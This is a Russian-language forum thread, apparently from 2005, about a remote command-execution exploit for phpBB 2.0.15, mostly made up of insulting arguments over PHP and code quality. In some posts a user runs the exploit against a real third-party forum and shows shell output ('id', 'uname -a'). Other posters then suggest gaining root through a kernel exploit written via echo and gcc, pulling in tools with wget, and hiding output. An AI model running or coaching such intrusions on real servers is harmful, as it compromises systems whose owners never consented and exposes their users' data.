Очередная уязвимость в OpenSource проекте - форум phpBB.

А также это живой пример тому, что php - говно. С очень низким входным интеллектуальным порогом и многочисленными "бейсиковыми" удобствами являет лакомый кусок для студентов недоучек. Результат, увы, плачевен.

Кстати, похоже именно из-за этого эксплойта практически сутки лежал forum.sysadmins.ru. При заходе на этот форум вываливалось сообщение что снесена БД (нет файлов php.MYI) и отсутствовали все исполняемые файлы этого форума. Похоже через этот эксплойт им кто-то сделал rm -rf /

А мне кажется, что сам php тут не при чем. На перле тоже можно реализовать удаленный шелл, это несложно. Тут просто налицо факт качества кода phpBB.

PHPbb писали абсолютные недоучки. Мало того, что код сам по себе кривой и тормознутый, да вдобавок еще и бажный до последней невозможности.

phpBB - это уже несколько лет анекдот какой-то непрерывный.

Не понимаю, каким идиотом нужно быть, чтобы его ставить.

Эксплойт проверенно работает на 2.0.15! Только что самолично убедился на тестовой машине. В 2.0.13 была другая, схожая уязвимость.

P.S. 2.0.16 и вышла из-за этой critical security bug. Читать сюда: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=302011

там в заголовке написано 2.0.15 -re-bug

Блин, ну ты хоть строчку для open source написал? ну везде есть ошибки. ВЕЗДЕ! Как булто и не программировал вовсе... в хелловорд! только ошибку трудно сделать. как надоела болтовня таких вот действительно **болов как ты! языком чесать горазды

Не знаю, работат ли эксплоит... Команды не выполняются. Просто никакого вывода нет, даже если пишешь бессмыслицу.

Может теперь в новостях все свежие эксплоиты будим обсуждать?

PHP - кал, особенно для server side. Java нужно использовать!!!

--седайко стюмчик

Неудивительно, phpBB всегда был дырявым, но надо заметить, что в php как в таковом очень много подводных камней, так что перед тем как ставить php скрипты(я имею в виду чужие) их обязательно надо внимательно просмотреть, подчистить и подлатать, это же очивидно и относится не только к php но и к тому же довольно дурацкому asp(упс, пардон, форум-то про линукс), к Java скриптам, да и к скриптам вообще.

> ну везде есть ошибки. ВЕЗДЕ!

Угу. В некоторых случаях они есть в ДНК.

И любой другой язык, в котором создать код, имеющий дыры, допускается.

Ах, ну да... Как же, ведь всякий "любой недоумок" писать на сях не будет. Так ведь и даже это не гарантирует абсолютный аудит кода.

> Не знаю, работат ли эксплоит... Команды не выполняются.

Да, такое иногда бывает. Кажется это зависит от того, разрешены ли regester_globals в php.ini. Но могу ошибаться. Пока эксперементирую.

> Ах, ну да... Как же, ведь всякий "любой недоумок" писать на сях не

> будет.

Вот вот. Тут вина php, конечно есть, но косвенная. Как говориться, если программа (в данном случае язык php) сделана для ламеров, то только ламера ей пользоваться и будут.

>Да, такое иногда бывает. Кажется это зависит от того, разрешены ли

>regester_globals в php.ini. Но могу ошибаться. Пока эксперементирую.

Зависит от того, настолько ли админ недоумок, чтобы на хосте дать Apache доступ к шелу. У меня вот просто выключен в принципе. Ибо реально нужен очень нечасто.

язык php не_сделан для ламеров- привлекает легкость написания на нем небольших программ и из этого никак не следует, что им пользуются только случайные люди. на php можно делать безопасный код. вообще профессионализм это когда программист использует инструмент для решения поставленной задачи и не важно что это будет за язык.

> Вот вот. Тут вина php, конечно есть, но косвенная. Как говориться, если программа (в данном случае язык php) сделана для ламеров, то только ламера ей пользоваться и будут.

Отучаемся говорить за всех. А то ещё получится, что русский язык - тоже для ламеров, потому что только ламеры пишут "извените".

>Как говориться, если программа (в данном случае язык php) сделана для ламеров, то только ламера ей пользоваться и будут.

рассмешил. пользоваться будут люди с совершенно разной квалификацией. и чем она ниже, тем код хуже.

открою страшный секрет. утверждение выше верно вне зависимости от языка. кривой код писать можно даже на python, более того, есть "программисты", которые так и делают. а уж большая часть того, что пишут на perl, вообще страшна до безобразия.

да уж, для демонов давать шел это круто =)

новость баян

этот сплоит был доступен еще неделю назад, ксакеп.ру как всегда тормозит

#!/usr/bin/perl # Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net #

> Зависит от того, настолько ли админ недоумок, чтобы на хосте

> дать Apache доступ к шелу.

Поясни, что ты имеешь в виду? Апаче запущен от какого-то юзера? Значит можно читать/писать/удалять файлы, принадлежащие этому юзеру. Что за бред "давать шелл апачу"? Что значит это словосочетание?

дык это публичный :)

> Что за бред "давать шелл апачу"? Что значит это словосочетание?

скорее всего это значит, что поимев пасс от юзера, под которым запущен апач, можно зайти с ним по ссх

Зато автор постинга демонстрирует всю широту своего многогранного ума :)

> скорее всего это значит, что поимев пасс от юзера, под которым

> запущен апач, можно зайти с ним по ссх

Значит он совершенно не понимает, как получается шелл... Нда...

>Поясни, что ты имеешь в виду? Апаче запущен от какого-то юзера? Значит

>можно читать/писать/удалять файлы

Неточно выразился. Не Apache конечно, просто в PHP есть чудная возможность выполнения команд в shell. И прошлая уязвимость работала, например, так: somefile.php?some_op&highlight="urlancode(команда шела)".

Соответственно...

bash$ ./exploit.txt
./exploit.txt: line 1: О╩©#!/usr/bin/perl: No such file or directory
: command not found 19:
: command not found 20:
./exploit.txt: line 21: use: command not found
: command not found 21:
./exploit.txt: line 22: use: command not found
: command not found 22:
: command not found 23:
./exploit.txt: line 24: syntax error near unexpected token `$ARGV[0]'
'/exploit.txt: line 24: `unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
bash$

Этот BuggedSource проект все жив?

согласен на все 100%

Привет Тузик, ты в хацкиры решил пойти? Ну да, давай, посмеемся над твоими потугами ;)))

на правильных серверах запуск команд в шел ЗАПРЕШЕН и ненадо тут гряз лить:) никто неговорит что PHP супер

спасибо

ламир

jb@ns1.stargate.shell-2~$ ./phpbb.pl http://deforum.ru/forum/viewtopic.php?t=1
deforum.ru - 80 - forum/viewtopic.php?t=1
phpBB2.0.15> id
uid=1199(de310453) gid=65535(nogroup) groups=65535(nogroup)
phpBB2.0.15> uname -a
Linux c1.310.ru 2.6.9-310 #10 SMP Mon May 23 19:46:19 MSD 2005 i686 i686 i386 GNU/Linux
phpBB2.0.15>

> Linux c1.310.ru 2.6.9-310 #

Вот вот. А теперь можно делать echo "рутовый эксплойт для 2.6.9" > exploit.c gcc exploit.c

и вот ты рут... Так вот локальные уязвимости становятся ремотными.

>bash$ ./exploit.txt >./exploit.txt: line 1: О╩©#!/usr/bin/perl: No such file or directory

повеселил Ж)))) слабо BOM убрать из начала файла? :))

похоже, скоро этот deforum.ru скоро сдохнет ;)

> похоже, скоро этот deforum.ru скоро сдохнет ;)

Похоже скоро весь 310.ru хренакнут :(

врядли

компилер там есть, но закачать сплоит нечем

у среднестатического скрипткиддиса не хватит мозгов, чтобы написать простенький даунлоадер

ужас.

> компилер там есть, но закачать сплоит нечем

зачем закачивать, когда есть echo? да и wget есть... Я отписал их саппорту, надеюсь быстро среагируют.

Скрипткидисы разгуляются....мля. Парвда на то и скрипткиддис, чтобы админ не дремал

Если эксплойн простенький, то можно и через echo "что-то" >> exploit.c или даже даунлоадер в download.php залить таким образом для более сложных вещей :) но согласен, что кидисы и до этого не додумаются

> зачем закачивать, когда есть echo? да и wget есть...

лучше через cat

вгет там есть, только почему то незапускается

> вгет там есть, только почему то незапускается

вывод попробуй перенаправить в /dev/null

И да не будем мы им помогать в этом "нелегком" деле =)

Хватит тупить. Я парл не знаю.

Так что слив защитан.

PS JB, хватит показывать свою необразованность.

Бобик, твое незнание перла не является отмазкой для подобной глупости

PS бобик, смотри, ведь опять забанят :))